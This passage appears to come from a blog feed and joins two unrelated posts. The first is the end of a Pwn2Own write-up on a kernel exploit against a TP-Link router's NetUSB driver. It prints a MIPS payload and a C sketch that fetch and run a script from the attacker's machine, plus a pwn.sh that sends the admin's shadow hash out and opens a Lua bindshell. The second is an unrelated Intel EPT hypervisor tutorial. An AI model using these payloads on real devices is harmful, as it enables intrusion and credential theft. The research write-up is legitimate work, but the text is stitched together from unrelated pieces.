#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to run user-mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it (a C sketch of the payload's logic follows the assembly below).

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0
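For reference, here is roughly what the payload does expressed in C against the 3.x-era kernel API (a hedged sketch: exact signatures vary across kernel versions, run_pwn_sh is an illustrative name, and {ip_local} is the exploit's template placeholder):

#include <linux/kmod.h>

// Build the argv/envp the assembly above encodes, then hand it to the
// usermodehelper machinery to run the command as root without blocking.
static void run_pwn_sh(void)
{
  static char *argv[] = {
    "/bin/sh", "-c",
    "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh",
    NULL
  };
  static char *envp[] = { NULL };

  struct subprocess_info *info =
      call_usermodehelper_setup(argv[0], argv, envp, GFP_ATOMIC);
  if (info)
    call_usermodehelper_exec(info, UMH_NO_WAIT);
}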

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK, at that point, it worked in QEMU... which is pretty wild. I never thought it would. Ever. What's also wild is that I was still in time for the Pwn2Own registration, so maybe this was actually possible 🤔. Reliability-wise, it worked well enough in the QEMU environment: about 3 times out of 5, I would say. Good enough.

I started to port the exploit over to the real device and, to my surprise, it worked there as well. The reliability was poorer, but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel, I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable, but hey, I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI staff would throw our exploits at the environment they had set up.

At that point we had two exploits, and that's what we registered. Right after receiving confirmation from ZDI, I noticed that TP-Link had pushed an update for the router 😳. I thought: Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything my exploit relied on: the kernel, etc. I finished my day at work and pulled the firmware from the website. I checked the release notes while the archive was downloading, but they didn't have any hints suggesting that either NetUSB or the kernel had been updated, which was... good. I extracted the filesystem from the firmware image with binwalk and quickly checked the NetUSB.ko file. I grabbed a hash and... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug / set up an environment for. I probably would not go that route if I were doing it again.
  • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post-auth vulnerability statically to get a root shell, but that was wasted time.
  • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
  • I also realized later that the same driver was running on the NETGEAR router and was reachable from the WAN port. I wasn't in it for the money, but it would probably pay to take a look at more than one target instead of directly diving deep into a single one exclusively.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hangout on Diary of reverse-engineering's Discord server with us!

MMU Virtualization via Intel EPT: Implementation – Part 1

31 January 2022 at 20:42

Overview

This article will cover the various requirements and features available for MMU virtualization via Intel Extended Page Tables. It's going to be a relatively long article, as I want to cover all or most of the details concerning initialization and capability checking, MTRR setup, page splitting, and so on. We'll start with checking feature availability and what capabilities are supported on the latest Intel processors, restructuring some of the VMM constructs to support EPT, and then move into the allocation of the page tables. This article will use the Windows memory management API to allocate and track resources. It's highly recommended that the reader research and implement a custom memory allocator that doesn't rely on the OS for resource allocation, as these can be attack vectors for malicious third parties. However, we will be sticking to the most straightforward approach for simplicity. There is a lot of information to cover, so let's not waste any more time on this overview.

Disclaimer

Readers must have a foundational knowledge of virtual memory, paging, address translation, and page tables. This information is in §4.1.0 V-3A Intel SDM.

As always, the research and development of this project were performed on the latest Windows 10 Build 21343.1000. To ensure compatibility with all features, be aware that the author hosts an Intel i9-10850k (Comet Lake) that supports the most recent virtualization extensions. During capability/feature support checks, if your processor doesn’t show availability, do not worry — as long as it supports baseline EPT all is good.

Feature Availability

To start, we need to check a few things to make sure that we support EPT and the different EPT policies. This project has a function that sets all VMX capabilities before launch, if available – checking for WB cache type, various processor controls and, relevant to this article, EPT, VPID, and INVPCID support. These capabilities are reported through the secondary processor controls, which we'll read from the IA32_VMX_PROCBASED_CTLS2 MSR. The low 32 bits indicate the allowed 0-settings of these controls, and the upper 32 bits indicate the allowed 1-settings. You should already have an algorithm set up to check and enable the various control features. If not, please refer back to this article in the first series on CPU virtualization.
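As a refresher, the sketch below shows the usual adjust-controls pattern (MSR index 0x48B for IA32_VMX_PROCBASED_CTLS2; the function name is illustrative):

#define IA32_VMX_PROCBASED_CTLS2_MSR_ADDRESS    0x048B

// Allowed 0-settings live in the low 32 bits (bits that must be 1),
// allowed 1-settings in the high 32 bits (bits that may be 1).
u32 adjust_secondary_controls(u32 desired)
{
    u64 cap = __readmsr(IA32_VMX_PROCBASED_CTLS2_MSR_ADDRESS);
    u32 allowed0 = (u32)cap;
    u32 allowed1 = (u32)(cap >> 32);

    desired |= allowed0;    // force the required bits on
    desired &= allowed1;    // strip the unsupported bits
    return desired;
}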

Possible Incompatibility

If your processor doesn’t support secondary processor controls, you will be unable to implement EPT. The likelihood of this being an issue is slim unless you’re using a very old processor.

Once the capabilities and policies have been verified and enabled, we will enable EPT. However, there will be an information dump first, because it's essential to understand extended paging as an extension of the existing paging mechanism, along with the structural changes to your hypervisor. We'll need to allocate a data structure inside our guest descriptor that will contain the EPTP. The design of your project will vary from mine, but the important thing is that each guest structure allocated has its own EPTP – this will be a 64-bit physical address. Here is an example of my guest descriptor:

typedef struct gcpu_descriptor_t
{
    uint16_t                id;
    gcpu_handle_t           guest_list;
    crn_access_rights       cr0_ar;
    crn_access_rights       cr4_ar;
    uint64_t                eptp;

    //
    // ... irrelevant members ...
    //

    gcpu_descriptor_t*      next_gcpu;
} gcpu_descriptor_t;

Once you have an EPTP member set up, you'll need to write its value into the VMCS EPT pointer field (VMCS_EPTP_ADDRESS) using whatever VMCS write primitive you have, similar to this:

// EPTP Address (Field Encoding: 0x201A)
//
vmwrite(vmcs, VMCS_EPTP_ADDRESS, gcpu->eptp);
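For completeness, this is roughly how the EPTP value itself is put together per the SDM's EPT pointer layout (a sketch; make_eptp is an illustrative helper, not part of the project code above):

// Bits 2:0  = EPT paging-structure memory type (6 = write-back),
// bits 5:3  = page-walk length minus one (3 for a 4-level hierarchy),
// bit 6     = enable accessed/dirty flags,
// bits N:12 = physical address of the EPT PML4 table.
uint64_t make_eptp(uint64_t pml4_physical, boolean_t enable_ad)
{
    uint64_t eptp = pml4_physical & ~0xFFFULL; // table must be 4kB-aligned
    eptp |= 6;                                 // WB memory type
    eptp |= (4 - 1) << 3;                      // 4-level page walk
    if (enable_ad)
        eptp |= 1ULL << 6;
    return eptp;
}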

Before implementing the main portion of the EPT code, let's address some important technical details. It's in your best interest to read the following sections thoroughly to ensure you understand why certain things are checked and why certain conditions are unsupported. Improper virtualization of the MMU can cause loads of issues as you build your project out, so it's imperative to understand how everything works before extending it. It's also good review, so that confusion is minimized in future sections… and because details are cool.

Memory Virtualization

Virtual memory and paging are necessary abstractions in today's working environments. They enable the modern computer system to efficiently utilize physical memory, isolate processes and execution contexts, and pass off the most complex parts of memory management to the OS. Before diving into the implementation of EPT, the reader (you) must have a decent understanding of virtual memory, paging, and address translation. There was a brief overview of address translation in the previous article. We'll go into more detail here to set the stage for allocating and maintaining your EPT page hierarchies.

— Virtual Memory and Paging

In modern systems, when paging is enabled, every process has its own dedicated virtual address space, managed at a specific granularity. This granularity usually is 4kB and, if you've ever heard the term page-aligned, then you've worked with paging mechanisms. Page-aligned buffers (like your VMCS) are buffers aligned on a page boundary — since memory is divided into granular chunks called pages, page-aligned means that the starting address of a buffer is at the beginning of a page. A simple way to verify whether an address is aligned on a page boundary is to check that the lower 12 bits of the address are clear (zero). However, this is only true for 4kB pages; pages with different granularity, such as 2MB, 4MB, or 1GB, will have different alignment masks. For example, take the address FFFFD288`BD600000. This address is 4kB page-aligned (the lower 12 bits are clear), but it would not be aligned on a page boundary if the page size were 1GB. To check this, we take the address and perform a bitwise AND against the complement of the page size (4kB, 2MB, 4MB, 1GB) minus 1, i.e. address & ~(size - 1).

The macro might look something like this: PAGE_ALIGN_4KB(_ADDRESS)   ((UINTPTR)(_ADDRESS) & ~(0x1000 - 1)). For 1GB, the 0x1000 (4,096) would be replaced by 0x40000000 (the size of a 1GB page). Give it a try yourself and look at the differences between the addresses when aligned on their respective granularity's boundary.
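A generic version of this check, assuming the size is a power of two (IS_ALIGNED_TO is an illustrative name):

#include <stdint.h>

// Power-of-two alignment check: true when the low log2(size) bits are clear.
#define IS_ALIGNED_TO(_ADDRESS, _SIZE) \
    ((((uint64_t)(_ADDRESS)) & (((uint64_t)(_SIZE)) - 1)) == 0)

// IS_ALIGNED_TO(0xFFFFD288BD600000ULL, 0x1000)     -> 1 (4kB-aligned)
// IS_ALIGNED_TO(0xFFFFD288BD600000ULL, 0x40000000) -> 0 (not 1GB-aligned)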

 Page Alignment Trivia

On a 4kB page size architecture, there are several different instances of page-aligned addresses other than 4,096. Two of those are 12,288 (0x3000) and 413,696 (0x65000) — as you may notice, the lower 12 bits are all clear in these. You can use any multiple of the desired page granularity to determine if an address is appropriately aligned. The expression (FFFFD288`BD600000 & ~(0x32000-1)) still results in the same address; thus, this address is page-aligned – 0x32000 is a multiple of the page granularity.

So, how is this virtual memory managed and mapped to a physical page? The implementation details are specific to the OS doing the memory management; there is enough information there for a whole book — luckily, much of it has been covered well in Windows Internals 7th Edition. The main thing to understand here is that all per-process mappings are stored in a page table, which allows for virtual-to-physical address translation. In modern systems using virtual memory, for every load/store operation on a virtual address, the processor translates the virtual address to a physical address to access the data in memory. There are hardware facilities like the Translation Lookaside Buffer (TLB) that expedite this address translation by caching the most recently used (MRU) page table entries (PTEs). This allows the system to leverage paging in a performant manner, since performing every step of the translation on each memory access (as happens on a TLB miss) would significantly reduce performance. The previous article briefly covered the TLB and the various conditions that may be encountered. It may be worth reviewing since it's been a bit since it was released…

  Overheads of Paging

As physical memory requirements grow, large workloads experience higher latency due to paging on modern systems. This is in part due to the size of the TLB not keeping pace with memory demands, and in part due to the TLB being on the processor's critical path for memory access. There are a few TLBs on modern systems but, most notably, the L1 and L2 TLBs have begun to stagnate in size. You can read more about this problem, referred to as TLB reach limitation, in the recommended reading section if interested. There are also several papers on ResearchGate proposing solutions to increase TLB reach.

The reason for mentioning this is that how you design virtual memory managers is vital in preserving the many benefits of paging without tanking system performance. This is something to consider when adding an additional layer of address translation, such as in the case of EPT. So, what about the page table?

𝛿 Address Translation Visualized

As mentioned above, the page table is a per-process (or per-context) structure that contains all the virtual-to-physical mappings of a process. The OS manages it, and the hardware performs the page table walk; in some cases, the OS fetches the translation. You know that this mapping of virtual to physical addresses occurs at the specified page granularity. So let's take a look at a diagram showing the process of translating a virtual address to a physical address and then walk through the process.

The above diagram features an abstract view that you've likely seen a few times throughout this series, but it's essential to keep it fresh in mind when walking through the actual address translation process. To address the abstract layout, we start with CR3, which contains the physical base address of the current task's topmost paging structure — in this case, the base of the PML4 table. The indexes into these different tables are determined by the linear address given for translation. A given PML4 entry (PML4E) will point to the base of a page directory pointer table (PDPT). At each step, the newly calculated physical address is dereferenced to determine the base of the next paging structure. An offset into that table is added to the entry's physical address, and so on, down the chain. Let's walk through the process with a non-trivial linear address to get a more concrete example of this.

The linear address given is the one shown in the figure above, and the CR3 value was determined by reading the _KPROCESS structure and pulling the address out of the DirectoryTableBase member, which was 13B7AA000. The first thing that must be done is to split the linear address into the parts required for address translation. The numbers above each block are the bit ranges that comprise that index. Bits 39 to 47, for instance, are the bits used to determine the offset into the PML4 table to find the corresponding PML4E. If you want to follow along or try it out for yourself, you can use SpeedCrunch or WinDbg (with the .format command) on the linear address and split it up accordingly. I'd say this is somewhat straightforward but, for the sake of giving as many examples as possible, the code below presents a few C macros that are useful for address translation.

#define X64_PML4E_ADDRESS_BITS          48
#define X64_PDPTE_ADDRESS_BITS          39
#define X64_PDTE_ADDRESS_BITS           30
#define X64_PTE_ADDRESS_BITS            21
        
#define PT_SHIFT                        12
#define PDT_SHIFT                       21
#define PDPT_SHIFT                      30
#define PML4_SHIFT                      39
        
#define ENTRY_SHIFT                     3

#define X64_PX_MASK(_ADDRESS_BITS)      ((((UINT64)1) << _ADDRESS_BITS) - 1)

#define Pml4Index(Va)                   (UINT64)(((Va) & X64_PX_MASK(X64_PML4E_ADDRESS_BITS)) >> PML4_SHIFT)
#define PdptIndex(Va)                   (UINT64)(((Va) & X64_PX_MASK(X64_PDPTE_ADDRESS_BITS)) >> PDPT_SHIFT)
#define PdtIndex(Va)                    (UINT64)(((Va) & X64_PX_MASK(X64_PDTE_ADDRESS_BITS)) >> PDT_SHIFT)
#define PtIndex(Va)                     (UINT64)(((Va) & X64_PX_MASK(X64_PTE_ADDRESS_BITS)) >> PT_SHIFT)

// Returns the physical address of PML4E mapping the provided virtual address.
//
#define GetPml4e(Cr3, Va)               ((PUINT64)(Cr3 + (Pml4Index(Va) << ENTRY_SHIFT)))

// Returns the physical address of the PDPTE which maps the provided virtual address.
//
#define GetPdpte(PdptAddress, Va)       ((PUINT64)(PdptAddress + (PdptIndex(Va) << ENTRY_SHIFT)))

// Returns the physical address of the PDTE which maps the provided virtual address.
//
#define GetPdte(PdtAddress, Va)         ((PUINT64)(PdtAddress + (PdtIndex(Va) << ENTRY_SHIFT)))

// Returns the physical address of the PTE which maps the provided virtual address.
//
#define GetPte(PtAddress, Va)           ((PUINT64)(PtAddress + (PtIndex(Va) << ENTRY_SHIFT)))

There's a lot of shifting and masking in the above; it can be quite daunting to those unfamiliar. The bit-shifting shenanigans are detailed well in the Intel SDM Vol. 3A Chapter 4, which will be in the recommended reading, as understanding paging and virtual memory in depth is necessary. However, circling back to our earlier example, I'll explain how these macros, in conjunction with a simple algorithm, can be used to traverse the paging hierarchy quickly and efficiently.

  Important Note

If you attempt to traverse the paging structures yourself, you will find that the entries inside each page table look something akin to 0a000001`33c1a867. This is normal; it is the format of the PTE data structure. On Windows, this is the structure type _MMPTE. If you cast an entry to this data structure, you'll see that it has a union specified which allows you to look at the individual bits set inside the hardware page structure, among other views. For instance, the example given – 0a000001`33c1a867 – is valid, dirty, allows writes, and has a PFN of 133c1a. The information you want for address translation is the page frame number (PFN).

Given the note above, we have to do two simple bitwise operations on the page table entry at each step to extract what these macros need. The first thing is to mask off the upper word (16 bits) of the entry — this leaves the page frame number plus the additional information such as the valid, dirty, owner, and accessed bits, which make up the bottom portion (the 867). In this case, using the entry value 0a000001`33c1a867, we perform a bitwise AND against a mask that retains the lower 48 bits (the maximum address size when 4-level paging is used). A mask that would do this can be constructed by setting bit position 48 and subtracting one, resulting in a mask with all the bits below 48 set. The mask can be hard-coded or generated with this expression: ((1ULL << 48) - 1).

If we take our address and do the following:

u64 pdpe_address = ( 0x0a00000133c1a867 & ( ( 1ULL << 48 ) - 1 ) ) ... /* one more step necessary */

We would be left with the lower 48 bits yielding the result 133c1a867. All that’s left is to clear the lower 12 bits and then pass the result to the next step in our address translation sequence. The bottom 12 bits must be clear since the address of the next paging structure will always be page-aligned. This can be done by masking them off and completing the above expression to yield the next paging structures address:

u64 pdpe_address = ( 0x0a00000133c1a867 & ( ( 1ULL << 48 ) - 1 ) ) & ~0xFFFULL;

The above is the same as doing 133c1a867 & 0x000FFFFFFFFFF000, but we want the cleanest solution possible. After this, the variable the result is assigned to holds the value 133c1a000, which is our PDPT base address in this example. These steps can be macro'd out, but I wanted to illustrate the actual entries being processed by hand so the logic becomes clear. The code excerpt below demonstrates how the macros provided before this example are intended to be used.

// This is a brief example, not production ready code...
// It assumes identity-mapped physical memory, and that X64_VIRTUAL_ADDRESS_BITS
// is defined as ((1ULL << 48) - 1).
//
u64 DirectoryBase = 0x1b864d000;
u64 Va = 0x760715d000;

u64* Pml4e = GetPml4e( DirectoryBase, Va );

u64 PdptBase = ( *Pml4e & X64_VIRTUAL_ADDRESS_BITS ) & ~0xFFF;
u64* Pdpte = GetPdpte( PdptBase, Va );

u64 PdtBase = ( *Pdpte & X64_VIRTUAL_ADDRESS_BITS ) & ~0xFFF;
u64* Pde = GetPdte( PdtBase, Va );

/* ... etc ... */

Ideally, you would loop over the levels, subtracting 9 from the shift amount at each step, while checking for presence, large pages, and the relevant bits and extensions in CR0 and CR4, among other things (a quick sketch follows below). We will cover a proper page walk in a later section of this article; this was intended to give a quick and dirty overview of the address translation process without checking for presence, large pages, access rights, etc. By now, hopefully, you have a decent idea of how virtual memory and address translation work, and the next section dives into SLAT mechanisms, in this case the Extended Page Tables (EPT) feature on Intel processors.
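As promised, here is the loop-based sketch (hedged: it assumes identity-mapped physical memory via a hypothetical phys_to_virt helper, and it still skips large pages, access rights, and CR0/CR4 checks):

// Minimal 4-level walk: the shift starts at 39 (PML4) and drops by 9 per level.
u64 translate(u64 cr3, u64 va)
{
    u64 table = cr3 & ~0xFFFULL;

    for (int shift = 39; shift >= 12; shift -= 9) {
        u64 index = (va >> shift) & 0x1FF;
        u64 entry = ((u64*)phys_to_virt(table))[index];

        if (!(entry & 1))                      // present bit clear: no mapping
            return 0;
        table = entry & 0x000FFFFFFFFFF000ULL; // next table (or final page frame)
    }
    return table | (va & 0xFFF);               // page frame + page offset
}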

— Extended Page Tables

Intel and other hardware manufacturers introduced virtualization extensions to allow multiple operating systems to execute on a single hardware setup. To perform better than the software virtualization solutions, many different facilities were introduced – one of them being EPT. This extension allows the host computer to fully virtualize memory by introducing a level of indirection between the guest virtual address space (the VM's virtual address space; GVA) and the host physical address space (HPA), called the guest physical address space (GPA). The addition of this second level in the address translation process is where the acronym SLAT is derived from, and it also modifies the process taken. The procedure formerly was VA → PA but, with SLAT enabled, becomes GVA → GPA → HPA. Guest virtual address to guest physical address translation is done through a per-process guest page table, and guest physical address to host physical address translation is performed through the per-VM host page table.

 

Figure 2. Guest Virtual Address to Host Physical Address

This method of memory virtualization is commonly referred to as hardware-assisted nested paging. It is accomplished by allowing the processor to hold two page-table pointers: one pointing to the guest page table and another to the host page table. As mentioned earlier, we know that address translation can negatively impact system performance if TLB misses are frequent. You can imagine this is doubly so with nested paging enabled: it multiplies overheads roughly 6-fold when a TLB miss occurs, since a 2-dimensional page walk is required. I write 2-dimensional because a native page walk traverses only one page hierarchy, whereas with extended paging there are two page tables to traverse. Natively, a memory reference that causes a TLB miss requires 4 accesses to complete translation; when virtualized, it increases to a whopping 24: each of the 4 guest page-table entries is referenced via a guest physical address that itself requires a 4-step EPT walk plus the entry access (4 × 5 = 20), and the final guest physical address needs one more 4-step EPT walk (20 + 4 = 24). This is where MMU caches and intermediate translations can improve the performance of memory accesses that result in a TLB miss – even when virtualized.

Anyways, enough of that, there will be some resources following the conclusion for those interested in reading about the page-walk caches and nested TLBs. I know you’re itching to initialize the EPT data for your project… so let’s get it goin’.

— EPT and Paging Data Structures

If you recall, in the first series on virtualization we had a single function that initialized the VMXON, VMCS, and other associated data structures. Prior to enabling VMX operation, but after allocating the regions for our VMXON and VMCS as well as any other host-associated structures, we're going to initialize our EPT resources. This will be done in the same function that runs for each virtual CPU. First and foremost, we need to check that the processor supports the features necessary for EPT. In my project, this happens while checking the various VM-entry/VM-exit/VM-control structures for which bits are supported; yours may differ. Below are the data structure, function, and required definitions for checking whether the EPT features are available.

// EPT VPID Capability MSR Address
//
#define     IA32_VMX_EPT_VPID_CAP_MSR_ADDRESS                                   0x048C

// EPT VPID Capability MSR Bit Masks
//
#define     IA32_VMX_EPT_VPID_CAP_MSR_EXECUTE_ONLY                              (UINT64)(0x0000000000000001)
#define     IA32_VMX_EPT_VPID_CAP_MSR_PAGE_WALK_LENGTH_4                        (UINT64)(0x0000000000000040)
#define     IA32_VMX_EPT_VPID_CAP_MSR_UC_MEMORY_TYPE                            (UINT64)(0x0000000000000100)
#define     IA32_VMX_EPT_VPID_CAP_MSR_WB_MEMORY_TYPE                            (UINT64)(0x0000000000004000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_PDE_2MB_PAGES                             (UINT64)(0x0000000000010000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_PDPTE_1GB_PAGES                           (UINT64)(0x0000000000020000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_INVEPT_SUPPORTED                          (UINT64)(0x0000000000100000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_ACCESSED_DIRTY_FLAG                       (UINT64)(0x0000000000200000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_EPT_VIOLATION_ADVANCED_EXIT_INFO          (UINT64)(0x0000000000400000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SUPERVISOR_SHADOW_STACK_CONTROL           (UINT64)(0x0000000000800000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SINGLE_CONTEXT_INVEPT                     (UINT64)(0x0000000002000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_ALL_CONTEXT_INVEPT                        (UINT64)(0x0000000004000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_INVVPID                                   (UINT64)(0x0000000100000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_INDIVIDUAL_ADDRESS_INVVPID                (UINT64)(0x0000010000000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SINGLE_CONTEXT_INVVPID                    (UINT64)(0x0000020000000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_ALL_CONTEXT_INVVPID                       (UINT64)(0x0000040000000000)
#define     IA32_VMX_EPT_VPID_CAP_MSR_SINGLE_CONTEXT_GLOBAL_INVVPID             (UINT64)(0x0000080000000000)

typedef union _msr_vmx_ept_vpid_cap
{
    u64 value;
    struct
    {
        // RWX support
        //
        u64 ept_xo_support : 1;
        u64 ept_wo_support : 1;
        u64 ept_wxo_support : 1;
        
        // Guest address width support
        //
        u64 gaw_21 : 1;
        u64 gaw_30 : 1;
        u64 gaw_39 : 1;
        u64 gaw_48 : 1;
        u64 gaw_57 : 1;
        
        // Memory type support
        u64 uc_memory_type : 1;
        u64 wc_memory_type : 1;
        u64 rsvd0 : 2;
        u64 wt_memory_type : 1;
        u64 wp_memory_type : 1;
        u64 wb_memory_type : 1;
        u64 rsvd1 : 1;
        
        // Page size support
        u64 pde_2mb_pages : 1;
        u64 pdpte_1gb_pages : 1;
        u64 pxe_512gb_page : 1;
        u64 pxe_1tb_page : 1;
        
        // INVEPT support
        u64 invept_supported : 1;
        u64 ept_accessed_dirty_flags : 1;
        u64 ept_violation_advanced_information : 1;
        u64 supervisor_shadow_stack_control : 1;
        u64 individual_address_invept : 1;
        u64 single_context_invept : 1;
        u64 all_context_invept : 1;
        u64 rsvd2 : 5;
        
        // INVVPID support
        u64 invvpid_supported : 1;
        u64 rsvd7 : 7;
        u64 individual_address_invvpid : 1;
        u64 single_context_invvpid : 1;
        u64 all_context_invvpid : 1;
        u64 single_context_global_invvpid : 1;
        u64 rsvd8 : 20;
    } bits;
} msr_vmx_ept_vpid_cap;

boolean_t is_ept_available( void )
{
    msr_vmx_ept_vpid_cap cap_msr;
    cap_msr.value = __readmsr(IA32_VMX_EPT_VPID_CAP_MSR_ADDRESS);
    
    if( !cap_msr.bits.ept_xo_support             ||
        !cap_msr.bits.gaw_48                     ||
        !cap_msr.bits.wb_memory_type             ||
        !cap_msr.bits.pde_2mb_pages              ||
        !cap_msr.bits.pdpte_1gb_pages            ||
        !cap_msr.bits.invept_supported           ||
        !cap_msr.bits.single_context_invept      ||
        !cap_msr.bits.all_context_invept         ||
        !cap_msr.bits.invvpid_supported          ||
        !cap_msr.bits.individual_address_invvpid ||
        !cap_msr.bits.single_context_invvpid     ||
        !cap_msr.bits.all_context_invvpid        ||
        !cap_msr.bits.single_context_global_invvpid )
    {
        return FALSE;
    }
    
    return TRUE;
}

The above code is intended to be placed into your project based on your layout. I included the macros for the bitmasks in case using the structure to represent the MSR is not as clean as desired. The is_ept_available function is intended to be called prior to setting the processor controls in the primary and secondary controls. Though we won't get into handling CR3-load exiting in this article, the two controls of interest for now are enable_vpid and enable_ept in the secondary processor controls field. You should set them based on the result of the previous function, as sketched below. If all is well and the processor supports the required features (which can be adjusted at your discretion), we'll need to set up the EPT data structures. However, before we do that, we have to take a little detour to explain the use of VPIDs.
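Wiring that up might look like this (bit positions from the SDM: enable EPT is bit 1 and enable VPID is bit 5 of the secondary processor-based controls; VMCS_SECONDARY_PROCESSOR_CONTROLS is an illustrative field name, and adjust_secondary_controls is the helper sketched earlier):

#define SECONDARY_CTL_ENABLE_EPT    (1u << 1)
#define SECONDARY_CTL_ENABLE_VPID   (1u << 5)

u32 secondary_ctls = 0; // your baseline secondary controls

if (is_ept_available())
    secondary_ctls |= SECONDARY_CTL_ENABLE_EPT | SECONDARY_CTL_ENABLE_VPID;

// Conform to the allowed 0/1 settings, then write the field.
secondary_ctls = adjust_secondary_controls(secondary_ctls);
vmwrite(vmcs, VMCS_SECONDARY_PROCESSOR_CONTROLS, secondary_ctls);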

— Virtual Processor Identifiers and Process-Context Identifiers

Back in 2008, Intel added a new cache hierarchy alongside some very important changes to the TLB hierarchy for caching virtual-to-physical address mappings. There were more involved changes, but what is relevant for our purposes is that the Intel Nehalem microarchitecture introduced the virtual processor identifier (VPID). As we know from the previous article, the TLB caches virtual-to-physical address translations for pages. The mapping cached in the TLB is specific to a task and guest (VM). On older processors, the TLB would be flushed incessantly as the processor switched between the VM and VMM, which had a massive impact on performance. The VPID tracks which guest a given translation entry in the TLB is associated with, giving the hardware the ability to selectively invalidate caches on VM-entry and VM-exit and removing the requirement to flush the TLB for coherence and isolation.

For example, if a process attempts to access a translation that it isn't associated with, the result is a TLB miss (followed by a page table walk) rather than an access violation. VPIDs were introduced to improve the performance of VM transitions. Coupled with EPT, which further reduced VM transition overhead (because the VMM no longer had to service every #PF itself), you begin to see a reduction in VM-exits and a significant improvement in virtualization performance. This feature brought with it new instructions allowing software to invalidate TLB mappings associated with a given VPID, documented as invvpid; similarly, EPT introduced the invept instruction, which allows software to invalidate cached information derived from the EPT page structures. To review some other technical details, please refer to the previous article.

Alongside the VPID technology, a hardware feature known as the process-context identifier (PCID) was introduced. PCIDs enable the hardware to “cache information for multiple linear-address spaces.” This means a processor can maintain cached data when software switches to a different address space with a different PCID. This was added at the same time in order to mitigate the performance impacts of TLB flushes due to context switching, and in a similar fashion to VPIDs, the instruction invpcid was added so that software may invalidate cached mappings in the TLBs associated with a specific PCID.

The main takeaway is that these features allow software to skip flushing of the TLB when performing a context switch. Without them, a TLB flush occurs on VM-entry and VM-exit due to the address space change (the reload of CR3). VPIDs support retention of TLB entries across VM switches and provide a performance improvement. Prior to this hardware feature being introduced, the TLB mapped {linear address} → {physical address}; utilizing VPID, the TLB maps {VPID, linear address} → {physical address}. Host software runs with a VPID of 0, and the guest will have a non-zero VPID assigned by the VMM. Note that some VMM implementations running on modern hardware leave the guest with a VPID of 0, which indicates that a TLB flush will occur on every VM-entry and VM-exit.

  Regarding PCID and VPID

As noted in the Intel SDM, software can use PCIDs and VPIDs concurrently; for this project, we will not concern ourselves with the use of PCIDs. If you would like to tinker with this you can find details on how to enable PCIDs in §4.10.1 Vol. 3A of the Intel SDM.

